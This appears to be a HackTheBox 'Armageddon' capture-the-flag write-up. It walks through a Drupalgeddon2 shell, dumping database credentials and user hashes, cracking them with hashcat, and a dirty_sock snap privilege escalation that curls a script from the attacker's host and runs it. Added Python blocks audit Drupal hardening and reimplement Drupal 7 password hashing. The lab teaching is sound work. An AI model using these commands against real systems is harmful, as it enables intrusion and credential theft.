HackTheBox: Armageddon | My Journey

Yudistira Arya
5 min read · Jul 25, 2021

First of all, I started by scanning for open ports using nmap:

nmap -sS -A -p- 10.10.10.233

I got 2 open ports: port 22 running an SSH service and port 80 running a web server using Drupal 7.

Checking in the browser, I found a login page with functionality like creating a new account, logging in, resetting a password, etc.

I tried to create a new account, but it didn't seem to work 🤨.

Let's check the web directories and file listing using a tool called dirscan:

python3 dirscan.py -u 10.10.10.233
200 317B http://10.10.10.233:80/.editorconfig
200 174B http://10.10.10.233:80/.gitignore
200 1KB http://10.10.10.233:80/COPYRIGHT.txt
200 109KB http://10.10.10.233:80/CHANGELOG.txt
200 2KB http://10.10.10.233:80/INSTALL.mysql.txt
200 18KB http://10.10.10.233:80/INSTALL.txt
200 2KB http://10.10.10.233:80/INSTALL.pgsql.txt
200 9KB http://10.10.10.233:80/MAINTAINERS.txt
200 18KB http://10.10.10.233:80/LICENSE.txt
200 5KB http://10.10.10.233:80/README.txt
200 10KB http://10.10.10.233:80/UPGRADE.txt
301 237B http://10.10.10.233:80/includes -> REDIRECTS TO: http://10.10.10.233/includes/
200 10KB http://10.10.10.233:80/includes/
200 7KB http://10.10.10.233:80/index.php
200 3KB http://10.10.10.233:80/install.php
200 132KB http://10.10.10.233:80/includes/bootstrap.inc
301 233B http://10.10.10.233:80/misc -> REDIRECTS TO: http://10.10.10.233/misc/
301 236B http://10.10.10.233:80/modules -> REDIRECTS TO: http://10.10.10.233/modules/
200 9KB http://10.10.10.233:80/modules/
301 237B http://10.10.10.233:80/profiles -> REDIRECTS TO: http://10.10.10.233/profiles/
200 271B http://10.10.10.233:80/profiles/minimal/minimal.info
200 278B http://10.10.10.233:80/profiles/testing/testing.info
200 743B http://10.10.10.233:80/profiles/standard/standard.info
200 2KB http://10.10.10.233:80/robots.txt
200 3KB http://10.10.10.233:80/scripts/
301 236B http://10.10.10.233:80/scripts -> REDIRECTS TO: http://10.10.10.233/scripts/
301 234B http://10.10.10.233:80/sites -> REDIRECTS TO: http://10.10.10.233/sites/
200 0B http://10.10.10.233:80/sites/example.sites.php
200 151B http://10.10.10.233:80/sites/all/libraries/README.txt
200 1KB http://10.10.10.233:80/sites/all/modules/README.txt
200 1020B http://10.10.10.233:80/sites/all/themes/README.txt
200 904B http://10.10.10.233:80/sites/README.txt
301 235B http://10.10.10.233:80/themes -> REDIRECTS TO: http://10.10.10.233/themes/
200 2KB http://10.10.10.233:80/themes/
200 2KB http://10.10.10.233:80/web.config
200 42B http://10.10.10.233:80/xmlrpc.php

Well, it seems these files don't have restrictive enough permissions, so we can read them 😏. Let's find something useful in the configuration files.
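From the defender's side, a listing like the one above is a quick way to check whether a Drupal 7 install is actually hardened. Here is an added Python audit (my own example, not code from the write-up, from dirscan or from Drupal) that reads dirscan-style output and flags three things: directory indexes being served (Drupal's .htaccess turns them off with Options -Indexes), files that Drupal's own FilesMatch deny rule is supposed to block (.inc, .info, dotfiles and editor backups, which only come back 200 when the .htaccess rules are not being applied), and CHANGELOG.txt, which reveals the exact core version. The deny pattern is reproduced from memory of the Drupal 7 .htaccess and should be compared with the copy in your own docroot; the sample input is an excerpt of the listing above.

```python
import posixpath
import re
from typing import List, Optional, Tuple
from urllib.parse import urlparse

# Assumption: the <FilesMatch> deny pattern shipped in Drupal 7's .htaccess,
# reproduced from memory. Compare it with the copy in your own docroot.
DRUPAL7_FILESMATCH = re.compile(
    r"\.(engine|inc|info|install|make|module|profile|test|po|sh|.*sql|theme"
    r"|tpl(\.php)?|xtmpl)(~|\.sw[op]|\.bak|\.orig|\.save)?$"
    r"|^(\..*|Entries.*|Repository|Root|Tag|Template)$"
    r"|^#.*#$"
    r"|\.php(~|\.sw[op]|\.bak|\.orig\.save)$"
)

# Shipped by Drupal but not blocked by it; reveals the exact core version.
VERSION_DISCLOSURE = {"CHANGELOG.txt"}

# Sample input: an excerpt of the dirscan listing from the write-up.
SAMPLE_SCAN = """\
200 317B http://10.10.10.233:80/.editorconfig
200 174B http://10.10.10.233:80/.gitignore
200 109KB http://10.10.10.233:80/CHANGELOG.txt
301 237B http://10.10.10.233:80/includes -> REDIRECTS TO: http://10.10.10.233/includes/
200 10KB http://10.10.10.233:80/includes/
200 7KB http://10.10.10.233:80/index.php
200 3KB http://10.10.10.233:80/install.php
200 132KB http://10.10.10.233:80/includes/bootstrap.inc
200 271B http://10.10.10.233:80/profiles/minimal/minimal.info
200 2KB http://10.10.10.233:80/robots.txt
200 0B http://10.10.10.233:80/sites/example.sites.php
200 2KB http://10.10.10.233:80/web.config
200 42B http://10.10.10.233:80/xmlrpc.php
"""


def parse_scan(text: str):
    """Yield (status, path) from lines shaped like 'STATUS SIZE URL ...'."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or not parts[0].isdigit():
            continue  # blank line or not a result row
        yield int(parts[0]), urlparse(parts[2]).path


def classify(status: int, path: str) -> Optional[str]:
    """Return why serving this path with a 200 is a hardening gap, or None."""
    if status != 200:
        return None  # redirects and errors are not exposures
    if path.endswith("/"):
        return "directory index served; Drupal's .htaccess sets Options -Indexes"
    name = posixpath.basename(path)
    if DRUPAL7_FILESMATCH.search(name):
        return "matches Drupal's FilesMatch deny rule; .htaccess is not being applied"
    if name in VERSION_DISCLOSURE:
        return "discloses the exact core version; delete it or deny it in the web server"
    return None


def audit(text: str) -> List[Tuple[str, str]]:
    """Findings in listing order, as (path, reason) pairs."""
    findings = []
    for status, path in parse_scan(text):
        reason = classify(status, path)
        if reason:
            findings.append((path, reason))
    return findings


if __name__ == "__main__":
    for path, reason in audit(SAMPLE_SCAN):
        print(f"{path:40s} {reason}")
```

On a correctly configured Apache with AllowOverride enabled, the .inc, .info and dotfile rows would come back 403 and the directory URLs would not list their contents; seeing them at 200, as in the scan above, is the signal that the shipped protections are not in effect.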

After reading some documentation and the directories opened above, I learned that the Drupal site configuration is located in /sites/default/settings.php.

But when I requested the file, it didn't render anything 😣

So I started searching for a Drupal 7 exploit on the internet and found something that might be useful here: https://github.com/dreadlocked/Drupalgeddon2.

Let's exploit!

ruby drupalgeddon2.rb 10.10.10.233

And boom, I got a shell.

Let's look at the Drupal config file again:

cat sites/default/settings.php

And we got the database credentials.

Because MySQL only accepts connections from localhost and the shell doesn't support an interactive terminal, I used this command to execute MySQL commands in one line:

mysql -u drupaluser -p'cencoredPassword' drupal -e '<commands here>'

The first command I used was SHOW TABLES, and there were some interesting tables.

Let's check the available columns with SELECT * FROM users; there was some credential information there. Let's pull only the useful columns with SELECT name,pass FROM users.

Hmm, I found some password hashes there. My assumption: brucetherealadmin is also a user account on this machine. Let's check it with cat /etc/passwd | grep /bin/bash

And yeah, my assumption was right.

Because the password was hashed… can I just crack it?

First, I tried to identify the hashes using this website: https://hashes.com/en/tools/hash_identifier, and found the hash type (it was Drupal 7).

Now I can crack the password using hashcat with this command:

hashcat -m 7900 hash.txt /usr/share/wordlists/rockyou.txt

7900 is hashcat's hash mode for Drupal 7. Reference: https://hashcat.net/wiki/doku.php?id=hashcat
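To make the hash mode concrete, here is an added Python port of the Drupal 7 password scheme that hashcat mode 7900 targets. It is my own example, not code from the write-up, from hashcat or from Drupal, and the salt and password in it are constructed. It shows why identification is trivial (every Drupal 7 hash starts with `$S$`, followed by one character encoding log2 of the iteration count and an 8-character salt), what a verifier like Drupal's user_check_password() computes, and where the per-guess cost comes from: 2^15 chained SHA-512 rounds by default, which slows a wordlist run down but does not save a password that is in the wordlist.

```python
import hashlib
import hmac
import re

# Alphabet Drupal 7 (and phpass) use for their custom base64 encoding.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
DRUPAL_HASH_LENGTH = 55                                 # stored hashes are cut to 55 chars
DRUPAL_MIN_HASH_COUNT, DRUPAL_MAX_HASH_COUNT = 7, 30    # accepted range of the exponent
DRUPAL_HASH_COUNT = 15                                  # Drupal 7 default: 2**15 rounds


def identify_hash(h: str) -> str:
    """Coarse format check; the offline equivalent of the hash identifier site."""
    if re.fullmatch(r"\$S\$[./0-9A-Za-z]{52}", h):
        return "drupal7 (hashcat -m 7900)"
    if re.fullmatch(r"\$[PH]\$[./0-9A-Za-z]{31}", h):
        return "phpass (hashcat -m 400)"
    if re.fullmatch(r"[0-9a-f]{32}", h):
        return "32 hex chars: raw MD5 or similar (unsalted)"
    return "unknown"


def _password_base64_encode(data: bytes) -> str:
    """Drupal's base64 variant: ITOA64 alphabet, no padding, 3 bytes -> 4 chars."""
    count = len(data)
    out = []
    i = 0
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return "".join(out)


def drupal7_crypt(password: str, setting: str):
    """Port of Drupal 7's _password_crypt('sha512', $password, $setting).

    `setting` is the first 12 chars of a stored hash: '$S$', one ITOA64 char
    holding log2(iterations), then an 8-char salt. Returns None on a bad setting.
    """
    setting = setting[:12]
    if len(setting) != 12 or setting[0] != "$" or setting[2] != "$":
        return None
    count_log2 = ITOA64.find(setting[3])
    if not DRUPAL_MIN_HASH_COUNT <= count_log2 <= DRUPAL_MAX_HASH_COUNT:
        return None
    salt = setting[4:12].encode()
    pw = password.encode()
    digest = hashlib.sha512(salt + pw).digest()
    for _ in range(1 << count_log2):      # this loop is the whole cost of a guess
        digest = hashlib.sha512(digest + pw).digest()
    return (setting + _password_base64_encode(digest))[:DRUPAL_HASH_LENGTH]


def drupal7_hash(password: str, salt: str, count_log2: int = DRUPAL_HASH_COUNT) -> str:
    """Create a hash. Drupal derives the salt from 6 random bytes; here the caller supplies it."""
    if len(salt) != 8 or any(c not in ITOA64 for c in salt):
        raise ValueError("salt must be 8 ITOA64 characters")
    return drupal7_crypt(password, "$S$" + ITOA64[count_log2] + salt)


def drupal7_verify(password: str, stored: str) -> bool:
    """What user_check_password() does for a '$S$' hash (legacy '$P$'/md5 forms not handled)."""
    if not stored.startswith("$S$"):
        return False
    computed = drupal7_crypt(password, stored)
    return computed is not None and hmac.compare_digest(computed, stored)


if __name__ == "__main__":
    # Constructed demo values, not from the box.
    stored = drupal7_hash("Summer2021!", "abcdefgh")
    print(stored, identify_hash(stored))
    print("correct password verifies:", drupal7_verify("Summer2021!", stored))
    print("wrong password verifies:  ", drupal7_verify("Winter2021!", stored))
```

The takeaway for whoever runs the site: the algorithm is public and the salt sits in the hash, so the only defences are the iteration count (which a site can raise via Drupal's password_count_log2 setting) and the strength of the password itself.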

And gotcha. Let's try to SSH with this credential.

Got the user flag. Now let's see if I can escalate this account to root 🔥.

First of all, I checked the commands available via sudo with sudo -l

I can install any snap package with root permissions. Let's look for an exploit on the internet.

I found this exploit for a snapd CVE: https://github.com/initstring/dirty_sock. Let's download it and use it on the machine.

On host:

git clone https://github.com/initstring/dirty_sock && cd dirty_sock
python3 -m http.server 1234

On machine:

cd /tmp
curl 10.10.16.6:1234/dirty_sockv2.py > sock2.py && chmod +x sock2.py
./sock2.py

But the script didn't work as expected ☹️

I started searching again on the internet and found this interesting article: https://notes.vulndev.io/notes/redteam/privilege-escalation/misc-1

Following the steps in that article, the snap package was installed and I had a new user with the credentials dirty_sock:dirty_sock that can execute all commands with sudo.

I can execute sudo su and become the root user.

That's the end! Hope y'all enjoyed my long long long (a little short?) journey xD

Thanks for reading. You can reach me on Telegram if you want to talk. Cheers!
